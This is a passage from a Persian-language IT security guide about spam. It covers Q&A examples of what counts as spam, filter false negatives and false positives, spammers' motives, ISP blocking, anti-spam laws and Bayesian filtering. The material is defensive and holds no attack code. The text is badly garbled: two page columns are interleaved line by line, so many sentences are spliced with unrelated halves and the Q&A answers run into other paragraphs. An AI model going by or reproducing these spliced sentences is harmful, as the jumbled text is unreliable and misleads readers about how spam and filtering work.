ﺁﻳﺎ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺣﺎﻭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ •
ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕﻲ ﻣﺮﺍﻗﺒﺖ ﺍﺯ ﺍﺟـﺰﺍﻱ ﺻـﻮﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ٧٢ﺭﻭﻱ ﺁﻥ •
ﻳــﻚ ﻫﺮﺯﻧﺎﻣــﻪ ﺑــﻪ ﺷــﻤﺎﺭ ﻣــﻲﺭﻭﺩ؟ ﭘﺎﺳــﺦ :ﺑﻠــﻪ، ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺑﻮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ )ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ
ﺷﻨﺎﺳﺎﻳﻲ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ UNIXﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ
ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺟـﺮﺍﺡ ﭘﻼﺳـﺘﻴﻚ
ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻫﺮ ﻛﺲ ﻛﻪ ﺁﻧﺮﺍ ﺳﺆﺍﻝ ﻛﻨﺪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ(.
ﺑﺎﺷــﻴﺪ ﻭ ﺍﻳــﻦ ﻧﺎﻣــﻪ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﻳــﻚ ﻣﻘﺎﻟــﺔ
ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎﺷﺪ ﻭ ﻧﻪ ﻳﻚ ﺁﮔﻬﻲ ﺗﺠﺎﺭﻱ. ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﺍﺟﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺁﺩﺭﺱ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ •
ﻛﻨﺪ.
ﺁﻳﺎ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻘﺎﻟﻪ ﺍﺯ ﺷﻤﺎ ﺑﺮﺍﻱ ﻳﻚ ﮔﺮﺩﻫﻤـﺎﻳﻲ •
ﺩﺍﻧﺸﮕﺎﻫﻲ ﺑﺎ ﻣﻮﺿـﻮﻋﻲ ﻣـﺒﻬﻢ ﻛـﻪ ﺑـﻪ ﭼﻨـﺪﻳﻦ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩ •
ﻓﻬﺮﺳﺖ ﺁﺩﺭﺱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺸﻤﺎﺭ ﺑﺎﺷﻴﺪ.
ﻣﻲﺭﻭﺩ؟ ﭘﺎﺳﺦ :ﺷﺎﻳﺪ .ﻣﮕـﺮ ﺍﻳﻨﻜـﻪ ﺑﻄـﻮﺭ ﺍﺗﻔـﺎﻗﻲ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻳـﻚ ﺻـﻔﺤﺔ ﻭﺏ ﻗـﺮﺍﺭ •
ﻣﻮﺿﻮﻉ ﺁﻥ ﻣﻮﺭﺩ ﻋﻼﻗﺔ ﺷﻤﺎ ﺑﺎﺷﺪ ﻭ ﻣﺎﻳﻞ ﺑﺎﺷـﻴﺪ ﺩﺍﺩﻩ ﺑﺎﺷﻴﺪ؛ ﻳﻌﻨـﻲ ﺍﺟـﺎﺯﻩ ﺩﺍﺩﻩ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺁﺩﺭﺱ
ﺑﻪ ﺁﻥ ﭘﺎﺳﺦ ﺩﻫﻴﺪ. ﭘﺴﺘﻲ ﺷﻤﺎ ﺑﺮﺍﻱ ﻫﻤﻪ ﻗﺎﺑﻞ ﻣﺸﺎﻫﺪﻩ ﺑﺎﺷﺪ.
ﺷــﺮﻛﺘﻲ ﻛــﻪ ﺑــﻪ ﺷــﻤﺎ ﻣﺤــﺼﻮﻟﻲ ﻓﺮﻭﺧﺘــﻪ ﻭ •
ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺼﻮﻝ ﺑﻌﺪﻱ ﺧﻮﺩ ﺑـﺮﺍﻱ
70 Public Mailing List
71 Newsgroup
73 Domain Name 72 Ident Daemon
٨٣ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻣـﺸﻜﻞ ﻭ ﭘﺮﻫﺰﻳﻨـﻪ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﻫـﻴﭻ ﺭﺍﻫﻜـﺎﺭ ﺷــﻤﺎ ﻭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻣــﺸﺘﺮﻳﻬﺎﻱ ﺩﻳﮕــﺮ ﺍﺭﺳــﺎﻝ
ﺍﺟﺮﺍﻳﻲ ﺑﺮﺍﻱ ﺁﻥ ﺍﻧﺪﻳﺸﻴﺪﻩ ﻧﺸﺪﻩ ﺍﺳﺖ. ﻣﻲ ﻛﻨﺪ ،ﺁﻳﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ؟ ﭘﺎﺳـﺦ :ﺧﻴـﺮ.
ﺍﻣــﺎ ﺑﺮﻧﺎﻣــﺔ ﻏﺮﺑــﺎﻝﺳــﺎﺯ ﻫﺮﺯﻧﺎﻣــﻪ ﺩﺭ ISPﺷــﻤﺎ
ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻤـﺪﺓ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺎﻧﻨـﺪ ﺷـﺮﻛﺘﻬﺎ( ﺍﺯ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺻﺮﻑ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ
ﭘﺬﻳﺮﻓﺘﻦ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺍﺯ ﺳﻮﻱ ISPﻫـﺎﻳﻲ ﻣﻨﺘـﺸﺮ
ﻛﻨﺪ ﻛﻪ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﭼﻨـﻴﻦ ﻧﺎﻣـﻪﺍﻱ ﻫﺮﺯﻧﺎﻣـﻪ
ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﺟﺎﺯﺓ ﻓﻌﺎﻟﻴﺖ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻧـﻮﻳﺲﻫـﺎ ﺭﺍ ﻣـﻲﺩﻫﻨـﺪ
ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ.
ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ .ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺆﺛﺮ ﻭﺍﻗﻊ ﺷﻮﺩ ،ﺯﻳﺮﺍ ISPﻫﺎ ﺭﺍ
ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ. ﺍﮔﺮ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﺎﻭﻱ ﻣﻄﻠﺒﻲ ﺑﺎﺷﺪ ﻛﻪ •
ﺑﺨﺶ ﺩﻭﻡ
ﻻ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺑﻲﮔﻨﺎﻫﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﻣﻌﻤﻮ ﹰ ﺑﺎ ﺗﻤﺎﻡ ﺗﻌﺎﺭﻳﻒ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺗﻠﻘﻲ ﺷﻮﺩ ،ﺁﻳﺎ ﺣﺘﻤـﹰﺎ
ﻛﻤﻲ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺎﺻﺪ ﻣﺨﺘﻠﻒ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨـﺪ ﻫـﻢ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ؟ ﭘﺎﺳﺦ :ﺑﻠﻪ؛ ﺍﻣﺎ ﺗﻨﻬـﺎ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ
ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ .ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﻼ ﺍﮔـﺮ ﺍﻳـﻦﺍﺻﻞ ﺁﻥ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻣﺎ ﻣـﺜ ﹰ
ﺗﺸﺨﻴﺺ ﻫﺮﺯﻧﺎﻣﻪ ،ﺣﺬﻑ ﺁﻥ ﻭ ﻳـﺎ ﻫـﺸﺪﺍﺭ ﺑـﻪ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ ﻧﺎﻣـــﻪ ﺍﺯ ﺳـــﻮﻱ ﻳﻜـــﻲ ﺍﺯ ﺧﻮﺍﻧﻨـــﺪﮔﺎﻥ ﺑـــﺮﺍﻱ
ﻣﺒﻨﻲ ﺑﺮ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ .ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺭﺍ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻓﺮﺳﺘﺎﺩﻩ ﻭ ﺩﺭ ﺁﻥ ﻣﺜﺎﻟﻬـﺎﻱ
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ISPﻳﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﭘﺴﺘﻲ ٧٤ﺑﻪ ﺍﺟﺮﺍ ﺟﺎﻟﺒﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺫﻛـﺮ ﺷـﺪﻩ ﺑﺎﺷـﺪ
ﺩﺭ ﺁﻭﺭﺩ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﺤﺘﻮﺍﻱ ﻧﺎﻣﻪ ﻭ ﻣﻨﺸﺎﺀ ﺍﺭﺳﺎﻝ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻣﻄﻤﺌﻨﹰﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ ﻭ ﻧﺒﺎﻳﺪ ﻏﺮﺑﺎﻝ ﺷﻮﺩ.
ﻣﻲﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺑﻪ ﺳـﺨﺘﻲ ﻗﺎﺑـﻞ ﺍﺭﺯﻳـﺎﺑﻲ
ﺝ( ﭼــﺮﺍ ﻫﺮﺯﻧﺎﻣــﻪﻧــﻮﻳﺲﻫــﺎ ﺑــﺮﺍﻱ ﺍﻓــﺮﺍﺩ ﻫﺮﺯﻧﺎﻣــﻪ ﺍﺭﺳــﺎﻝ
ﻫﺴﺘﻨﺪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰﻻ ﺩﺍﺭﺍﻱ ﺗـﺸﺨﻴﺺ
ﻣﻲﻛﻨﻨﺪ؟ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺟﻮﺍﺏ :ﭼﻮﻥ ﺍﻳﻨﻜﺎﺭ ﺟﻮﺍﺏ ﻣﻲﺩﻫـﺪ!
ﻣﻨﻔﻲ ﻧﺎﺩﺭﺳﺖ ) (False Negativeﻭ ﺗﺸﺨﻴﺺ ﻣﺜﺒﺖ ﻧﺎﺩﺭﺳـﺖ
ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ ﺳـﺮﻳﻌﹰﺎ ﻣﺘﻮﺟـﻪ
) (False Positiveﻣﻲﺑﺎﺷﺪ.
ﻻ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﻳﻚ ﺍﻟﮕﻮ ﺩﺭ ﺁﻥ ﻣﻲﺷﻮﻳﺪ .ﻣﻌﻤﻮ ﹰ
False Negative ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﭘﻮﻝ ﻳﺎ ﭘﺲﺍﻧﺪﺍﺯ ﺁﻥ،
Falseﺯﻣـﺎﻧﻲ ﺭﺥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﺔ Negative ﺍﺭﺗﻘﺎﻱ ﺯﻧﺪﮔﻲ ﻋﺎﻃﻔﻲ ﻳﺎ ﺧﺼﻮﺻﻲ ،ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻼﻣﺘﻲ.
ﺟﺴﺘﺠﻮﮔﺮ ٧٥ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻳﻚ ﻧﻘﻄﺔ ﻣﺸﺘﺮﻙ ﻣﻬﻢ ﺩﺍﺭﻧﺪ :ﺍﻏﻠﺐ ﻣـﺎ
ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ .ﺍﻳﻦ ﺑـﺪﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺟﺪﻱ ﺩﺍﺭﻳﻢ ﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ
ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ ﻣﺎ ﻧﻴﺰ ﺗﻮﺟﻪ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﻛﻨﻴﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ
ﻏﺮﺑﺎﻝ ﻋﺒﻮﺭ ﻛﻨـﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺍﺳـﺖ ﻛـﻪ ﮔﻔﺘـﻪ ﺍﮔﺮ ﺩﺭﺻﺪ ﺑﺴﻴﺎﺭ ﺍﻧﺪﻛﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ،ﺍﻳﻦ ﻧﺎﻣﻪﻫـﺎ
ﻣﻲﺷﻮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ %۱۰۰ﻣﺆﺛﺮ ﻧﺒﺎﺷﺪ. ﻼ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ ۱ﻧﺎﻣـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﻫـﺮ ﺭﺍ ﭘﻴﮕﻴﺮﻱ ﻛﻨﻨـﺪ )ﻣـﺜ ﹰ
۱۰۰،۰۰۰ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ( ﻫﺮﺯﻧﺎﻣﻪ ﻧﻮﻳﺲ ﻫـﺎﻳﻲ ﻛـﻪ ﭼﻨـﺪﻳﻦ
False Positive
ﻣﻴﻠﻴﻮﻥ ﭘﻴﺎﻡ ﺩﺭ ﺭﻭﺯ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﻮﻝ ﺯﻳﺎﺩﻱ
False Positiveﺑـــﺪﻳﻦ ﻣﻌﻨﺎﺳـــﺖ ﻛـــﻪ ﺑﺮﻧﺎﻣـــﺔ ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ.
ﺟﺴﺘﺠﻮﮔﺮ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺑﻲﺿـﺮﺭ
ﻫﺮﺯﻧﺎﻣﻪ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺑـﺎﺭ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﭼﻪ ﺑﺎﻳﺪ ﻛﺮﺩ؟
ﻣﻲﺁﻭﺭﺩ ،ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ ﺗـﺸﺨﻴﺺ ،ﻧﺎﻣـﺔ
ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ
ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﺑﺠﺎﻱ ﺗﺤﻮﻳﻞ ﺷﺪﻥ ،ﺣﺬﻑ ﮔـﺮﺩﺩ .ﻣﻤﻜـﻦ
ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻭ ﻛﻨﺘﺮﻝ ﻛـﺮﺩ .ﺑﺮﺧـﻲ ﺍﺯ ﺩﻭﻟﺘﻬـﺎ ﺩﺭ ﺣـﻮﺯﺓ
ﺍﺳﺖ ﺑﺎ False Positiveﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺎﺩﻱ
ﻗﻀﺎﻳﻲ ﺧﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﮔـﺴﺘﺮﺵ ﻫﺮﺯﻧﺎﻣـﻪ
ﻭ ﺑﻲﺿﺮﺭ ﺍﺯ ﺩﺳﺖ ﺑﺮﻭﻧﺪ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ.
ﺗــﺼﻮﻳﺐ ﻛــﺮﺩﻩﺍﻧــﺪ .ﺍﻛﺜــﺮ ISPﻫــﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ
ﺗﺴﻬﻴﻼﺕ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺧﻼﻑ ﺗﻮﺍﻓﻘﻨﺎﻣﻪﻫـﺎﻱ
ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺗﺼﻮﻳﺐ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻨﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ،
74 Mail Client
ﺍﻣﺎ ﺗﺎﻛﻨﻮﻥ ﺍﻋﻤﺎﻝ ﺍﻛﺜﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﺴﻴﺎﺭ
75 Scanning Program
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٨٤
ﺭﻭﺵ ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨــﺪﺓ ﺟﺪﻳــﺪ ﺿــﺪ ﻫﺮﺯﻧﺎﻣــﻪ ﺭﻭﺷــﻲ ﺑــﻪ ﻧــﺎﻡ ﻫﺪﻑ ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﺟـﺴﺘﺠﻮﻱ ﻫﺮﺯﻧﺎﻣـﻪ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻥ
Bayesian Filteringﺍﺳـــﺖ .ﺩﺭ ﺍﻳـــﻦ ﺭﻭﺵ ﻗـــﻮﺍﻧﻴﻦ False Negativeﻭ ﺍﺯ ﺑــﻴﻦ ﺑــﺮﺩﻥ False Positive
ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺎ ﺷﻨﺎﺧﺖ ﺷﻤﺎ ﺍﺯ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺻﻼﺡ ﻣﻲ ﺷـﻮﺩ .ﺍﻳـﻦ ﻻ
ﻣــﻲﺑﺎﺷــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﻛــﺎﻫﺶ False Negativeﻣﻌﻤــﻮ ﹰ
ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩﺍﻱ ﻣﺘﻐﻴـﺮ ﺑﺎﺷـﻨﺪ. False Positiveﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ .ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﻪ ﻫـﺮ
ﻫﺪﻑ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ،ﺁﻣﻮﺯﺵ ﺩﻳﺪﻥ ﺑﺮﻧﺎﻣﻪ ﻏﺮﺑـﺎﻝﺳـﺎﺯ ﺍﺯ ﺭﻓﺘـﺎﺭ ﺩﻟﻴﻠﻲ ﻧﻴﺎﺯ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﺒﻴﻪ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪ
ﺷﻤﺎ ﺍﺳﺖ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻓﺮﺩ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ ﻭ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺁﺳـﻴﺐ ﺑﻴﻨﻨـﺪ .ﺁﺧـﺮﻳﻦ ﻧﻤﻮﻧـﺔ
ﻻ ﺑﻌﻨﻮﺍﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﻲﺷـﻮﻧﺪ ﺍﻣـﺎ ﻣﺤﺘﻮﻳﺎﺗﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ ﮔﺰﺍﺭﺵﺷﺪﺓ ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺧﺒﺮﻧﺎﻣـﺔ ﺩﺍﻧـﺸﮕﺎﻫﻲ ﺑـﻮﺩ
ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺷـﻤﺎ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﺭﺩ ﻛﻨـﺪ .ﺻـﺎﻓﻴﻬﺎﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﻣﻄﺎﻟﺒﻲ ﻣﻄﺮﺡ ﺷـﺪﻩ ﺑـﻮﺩ .ﺍﺯ
bayesianﺍﺯ ﻓﻨﻮﻥ ﺯﺑﺎﻥﺷﻨﺎﺳـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺑـﻪ ﺁﻧﺠﺎ ﻛﻪ ﺧﺒﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﻮﺩ،
ﻧﺎﻣﻪ ﻫﺎﻳﻲ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺩﻫﻨﺪ ﻛﻪ ﺣﺎﻭﻱ ﻟﻐﺎﺕ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ ﺗﻮﺳﻂ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻫﺮﺯﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﺪ ﻭ
ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﺔ ﺭﻓﺘﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻤﺎ ﺩﺭ ISPﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺁﻧﺮﺍ ﻏﺮﺑﺎﻝ ﻭ ﺣﺬﻑ ﻧﻤﻮﺩﻧﺪ.
ﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻗﻌﻴﺘﺎﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﺍﻣﺎ ﺑﻨﺪﺭﺕ ﺩﺭ ﻫﺮﺯﻧﺎﻣـﻪ ﻇـﺎﻫﺮ
ﻋﻼﻭﻩ ﺑﺮ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻫﺮﺯﻧﺎﻣـﻪ ،ﺭﻭﺷـﻬﺎﻱ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ
ﻣﻲ ﺷﻮﻧﺪ .ﺻﺎﻓﻴﻬﺎﻱ bayesianﺑﺮﺍﻱ ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺴﺖ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﻓﻨﻮﻥ ﭘﺮﺳﺶ -ﭘﺎﺳﺦ ٧٦ﺍﺳﺘﻔﺎﺩﻩ
